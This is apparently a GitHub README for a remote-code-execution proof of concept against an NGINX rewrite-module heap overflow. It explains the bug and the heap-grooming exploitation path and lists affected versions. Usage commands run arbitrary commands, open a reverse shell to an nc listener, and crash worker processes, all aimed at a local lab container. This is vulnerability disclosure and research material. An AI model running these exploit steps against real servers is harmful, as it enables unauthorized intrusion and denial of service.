Skip to content
 
 

Latest commit

 

History

5 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

NGINX Rift

RCE Proof of concept for CVE-2026-42945, a critical heap buffer overflow in NGINX's ngx_http_rewrite_module introduced in 2008. The bug enables unauthenticated remote code execution against servers using rewrite and set directives.

This vulnerability — along with three other memory corruption issues (CVE-2026-42946, CVE-2026-40701, CVE-2026-42934) — was autonomously discovered by depthfirst's security analysis system after a single click of onboarding the NGINX source.

Want to find issues like this in your own code? Try the same system at https://depthfirst.com/open-defense.

The Bug (TL;DR)

NGINX's script engine uses a two-pass process: first compute the required buffer size, then copy data in. The is_args flag is set on the main engine when a rewrite replacement contains ?, but the length-calculation pass runs on a freshly zeroed sub-engine. So:

  • Length pass sees is_args = 0 → returns raw capture length.
  • Copy pass sees is_args = 1 → calls ngx_escape_uri with NGX_ESCAPE_ARGS, expanding each escapable byte to 3 bytes.

The copy overflows the undersized heap buffer with attacker-controlled URI data. Exploitation uses cross-request heap feng shui to corrupt an adjacent ngx_pool_t's cleanup pointer (sprayed via POST bodies, since URI bytes can't contain null bytes), redirecting it to a fake ngx_pool_cleanup_s invoking system() on pool destruction.

Read more about this bug in our technical write-up.

Affected & Fixed Versions

Product Affected Fixed in
NGINX Open Source 0.6.27 – 1.30.0 1.31.0, 1.30.1
NGINX Plus R32 – R36 R36 P4, R35 P2, R32 P6

Full vendor advisory: https://my.f5.com/manage/s/article/K000160932

Requirements

  • Nix(flakes 有効)+ Podman
  • Python 3

Usage

Tested on Ubuntu 24.04.3 LTS.

1. ビルド(初回のみ)

./start.sh

初回はイメージが存在しないため自動でビルドします(nginx をソースからコンパイルするため数分かかります)。

2. 起動

./start.sh

脆弱な nginx が 127.0.0.1:19321 で起動します(ASLR 無効)。

3. PoC 実行

コマンド実行モード:

python3 poc.py --cmd 'id > /tmp/pwned'

exploit が成功すると nginx worker が system() を実行してクラッシュします。

podman exec nginx-rift-poc cat /tmp/pwned

インタラクティブシェルモード:

# ターミナル1: リバースシェルを待ち受け
nc -l -p 1337

# ターミナル2: exploit 実行
python3 poc.py --shell --listen-ip 10.88.0.1 --listen-port 1337

クラッシュ確認モード(DoS 影響の検証):

CVE-2026-42945 は heap corruption により nginx worker を繰り返しクラッシュさせられます。 パッチ適用前後の DoS 耐性確認には以下を使います:

python3 poc.py --cmd 'true'

成功すると worker がクラッシュし、master が再起動するまでの間リクエストが処理されません。 --cmd 'true' は何も副作用がないため、クラッシュそのものだけを確認できます。

4. 停止

./stop.sh

About

exploit for CVE-2026-42945

Topics

Resources

Stars

0 stars

Watchers

0 watching

Forks

Contributors

Languages